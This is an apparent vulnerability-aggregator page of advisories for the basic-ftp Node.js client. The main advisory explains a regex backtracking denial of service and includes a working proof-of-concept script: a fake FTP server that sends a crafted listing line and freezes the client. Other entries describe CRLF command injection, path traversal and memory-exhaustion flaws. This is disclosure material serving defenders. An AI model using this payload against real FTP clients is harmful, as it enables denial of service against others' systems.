Where
-Infinity
0
Severity
8.2
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Summary

Client.list() parses the server's directory listing with the Unix-style parser in parseListUnix.js. Its RELINE regex has two adjacent (\S+(?:\s\S+)) groups (owner name, then group name) followed by a required numeric size group. When a line starts with a valid listing prefix but the tokens after it never satisfy the size and date fields, the engine backtracks over every way of splitting those tokens between the two groups before it can fail, so matching one line costs roughly O(n²) in the line's length.

The server whose directory a client lists controls that listing, so it can return one line that pins the Node.js event loop for as long as it likes. parseList() picks the parser from the last non-blank line only, then runs it on every line, so a normal line placed last selects the Unix parser and a crafted line earlier hits the quadratic match.

Proof of concept

npm i basic-ftp && node repro.js:

js const net = require("net"), ftp = require("basic-ftp"); const KB = Number(process.env.LINEKB || 128); const payload = "-rw-r--r-- 1 " + "a ".repeat((KB 1024 - 13) / 2) + "!"; const listing = payload + "\r\n-rw-r--r-- 1 owner group 42 Jan 1 2020 file.txt\r\n"; const server = net.createServer(c => { c.setEncoding("latin1"); c.write("220 ok\r\n"); let buf = ""; c.on("data", d => { buf += d; let i; while ((i = buf.indexOf("\r\n")) !== -1) { const cmd = buf.slice(0, i).toUpperCase(); buf = buf.slice(i + 2); if (cmd.startsWith("USER")) c.write("331 .\r\n"); else if (cmd.startsWith("PASS")) c.write("230 .\r\n"); else if (cmd.startsWith("FEAT")) c.write("211-x\r\n UTF8\r\n211 End\r\n"); else if (cmd.startsWith("EPSV")) { const ds = net.createServer(s => { s.write(listing); s.end(); }); ds.listen(0, "127.0.0.1", () => c.write(229 (|||${ds.address().port}|)\r\n)); } else if (cmd.startsWith("LIST")) { c.write("150 .\r\n"); setTimeout(() => c.write("226 .\r\n"), 50); } else c.write("200 .\r\n"); } }); }); server.listen(0, "127.0.0.1", async () => { const client = new ftp.Client(0); await client.access({ host: "127.0.0.1", port: server.address().port, user: "x", password: "y" }); let beats = 0; const hb = setInterval(() => beats++, 1000); const t = Date.now(); await client.list(); clearInterval(hb); console.log(list() blocked ${(Date.now() - t) / 1000}s; heartbeats fired: ${beats}); process.exit(0); });

Prints list() blocked 39.75s; heartbeats fired: 0, versus ~0.06s for a normal listing. The event loop is frozen the whole time. Cost is quadratic: 32 KB ≈ 2.4s, 64 KB ≈ 9.6s, 128 KB ≈ 39s. maxListingBytes defaults to 40 MB, so a single line can be far larger, and ~1 MB already blocks for tens of minutes.

Impact

One directory listing freezes the whole process, under default options, through the primary API. This is the same "malicious FTP server causes client-side denial of service" shape as GHSA-rp42-5vxx-qpwr, also in Client.list() and rated high. The byte cap added there bounds memory, not the parser's CPU cost.

1 / 2
Source: GitHub
First published (updated )
Severity
7

basic-ftp is an FTP client for Node.js. Prior to 5.3.1, basic-ftp is vulnerable to client-side denial of service when parsing FTP control-channel multiline responses. A malicious or compromised FTP server can send an unterminated multiline response during the initial FTP banner phase, before authentication. The client keeps appending attacker-controlled data into FtpContext.partialResponse and repeatedly reparses the accumulated buffer without enforcing a maximum control response size. As a result, an application using basic-ftp can remain stuck in connect() while memory and CPU usage grow under attacker-controlled input. This can lead to process-level denial of service, container OOM kills, worker restarts, queue backlog, or service degradation in applications that automatically connect to FTP endpoints. This vulnerability is fixed in 5.3.1.

First published (updated )
Severity
7.5
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

basic-ftp is an FTP client for Node.js. Versions prior to 5.3.0 are vulnerable to denial of service through unbounded memory growth while processing directory listings from a remote FTP server. A malicious or compromised server can send an extremely large or never-ending listing response to Client.list(), causing the client process to consume memory until it becomes unstable or crashes. Version 5.3.0 fixes the issue.

First published (updated )
Severity
7
Command Injection

basic-ftp is an FTP client for Node.js. Prior to 5.2.1, basic-ftp allows FTP command injection via CRLF sequences (\r\n) in file path parameters passed to high-level path APIs such as cd(), remove(), rename(), uploadFrom(), downloadTo(), list(), and removeDir(). The library's protectWhitespace() helper only handles leading spaces and returns other paths unchanged, while FtpContext.send() writes the resulting command string directly to the control socket with \r\n appended. This lets attacker-controlled path strings split one intended FTP command into multiple commands. This vulnerability is fixed in 5.2.1.

First published (updated )
Severity
9.8
EPSS
0.07%
Path Traversal
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

The basic-ftp FTP client library for Node.js contains a path traversal vulnerability (CWE-22) in versions prior to 5.2.0 in the downloadToDir() method. A malicious FTP server can send directory listings with filenames containing path traversal sequences (../) that cause files to be written outside the intended download directory. Version 5.2.0 patches the issue.

1 / 2
Source: NVD
First published (updated )

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203